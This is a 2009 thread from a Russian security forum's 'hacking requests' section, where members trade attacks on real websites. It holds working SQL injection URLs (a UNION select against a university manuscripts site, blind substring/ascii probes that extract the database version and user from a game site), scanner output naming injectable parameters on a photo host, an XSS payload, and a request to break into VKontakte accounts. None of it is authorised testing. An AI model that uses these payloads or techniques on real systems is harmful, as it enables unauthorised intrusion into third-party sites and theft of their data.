HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #331  
Старый 09.01.2009, 20:02
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от zifanchuck  
скажи сайт
или кинь в личку
А у тебя есть какие то предположения? Поделись.
 

  #332  
Старый 09.01.2009, 20:05
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

у меня просто на днях было что ордер показывал 12 а унион говорил типа неверно.
Я перебирал униуном и нашол
 

  #333  
Старый 09.01.2009, 20:11
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от zifanchuck  
у меня просто на днях было что ордер показывал 12 а унион говорил типа неверно.
Я перебирал униуном и нашол
я дошол перебором до 70 колонок, тем более что есть sql запрос - и из него видно что выбераеться 16 значений, а ладно, на ковырейте, мне просто интересно почему так -
http://manuscripts.cmrs.ucla.edu/Manuscripts_list.php?a=querysearch&value=3&whereSt ring=TRUE)+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16/*
по всей видимости это какая то бага совместого использования distinct и union, короче хз.

Последний раз редактировалось AkyHa_MaTaTa; 09.01.2009 в 20:35..
 

  #334  
Старый 09.01.2009, 20:39
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

AkyHa_MaTaTa, DISTINCT тут не при чём... Походу этот запрос как-то изменяется в зависимости от какого-то условия...
 

  #335  
Старый 09.01.2009, 20:40
Витян
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме:
2544458

Репутация: 243
По умолчанию

при поиске Blind SQL, мне сканер выдал

http://www.radikal.ru/action.aspx

The POST variable M is vulnerable
The POST variable VM is vulnerable
The POST variable V is vulnerable

http://www.radikal.ru/REGISTER/PageLostPassword.aspx

The POST variable in_reset_code is vulnerable
The POST variable in_new_pass_conf is vulnerable

http://www.radikal.ru/toadmin.aspx

The POST variable cb_type is vulnerable

что с этим сделать можно?
 

  #336  
Старый 27.02.2009, 21:44
Velliton
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

http://avalon-game.in/game/2/f_site_found.php?login=%3Cscript%3Ealert('%C8%20%F D%F2%EE%E3%EE%20%F7%E5%F0%E5%E7%20SQL%20%E8%ED%FC% E5%EA%F6%E8%FE%20%EF%F0%E8%F1%E0%ED%F3%F2.');%3C/script%3E - что это? и что дальше делать? Извените заранее если это тупо, я есчё нуб
 

  #337  
Старый 04.03.2009, 19:25
viski
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

мне нужно научится взламывать пароли и мэйлы вконтакте,помогите плиз... очень нужно
 

  #338  
Старый 13.03.2009, 12:21
telhar
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Малоуважаемый vellition, ваш вопрос не в тему, так как в в файле f_site_found.php всего 5 строчек, из которых ни в одной из них нет ни слова о работе с базой данных. В данной ситуации могу посоветовать разве что прочитать книжку "PHP для бокланов".

Последний раз редактировалось telhar; 13.03.2009 в 12:36..
 

Помогите плиз! Совсем запарился!((
  #339  
Старый 20.03.2009, 02:46
srade
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию Помогите плиз! Совсем запарился!((

http://veng.ru/index.php?page='


Что дальше что не подбирал не лез(((

Заранее благодарен!
 

  #340  
Старый 21.03.2009, 03:41
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Вот что побыстрому нарыл:
Цитата:
http://veng.ru/player_info.php?name=%CC%E0%F0%F2%E8'+and+substrin g(version(),1,1)=4/*
4ая версия.

Цитата:
http://veng.ru/player_info.php?name=%CC%E0%F0%F2%E8'+and+ascii(su bstring((select+user()),1,1))=114/*
и
Цитата:
http://veng.ru/player_info.php?name=%CC%E0%F0%F2%E8'+and+ascii(su bstring((select+user()),2,1))=111/*
От сюда делаю вывод что юзер root,но даже доступа к mysql.user нету т.к. даже '1' не возвращает про file_priv и password вообще молчу.
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ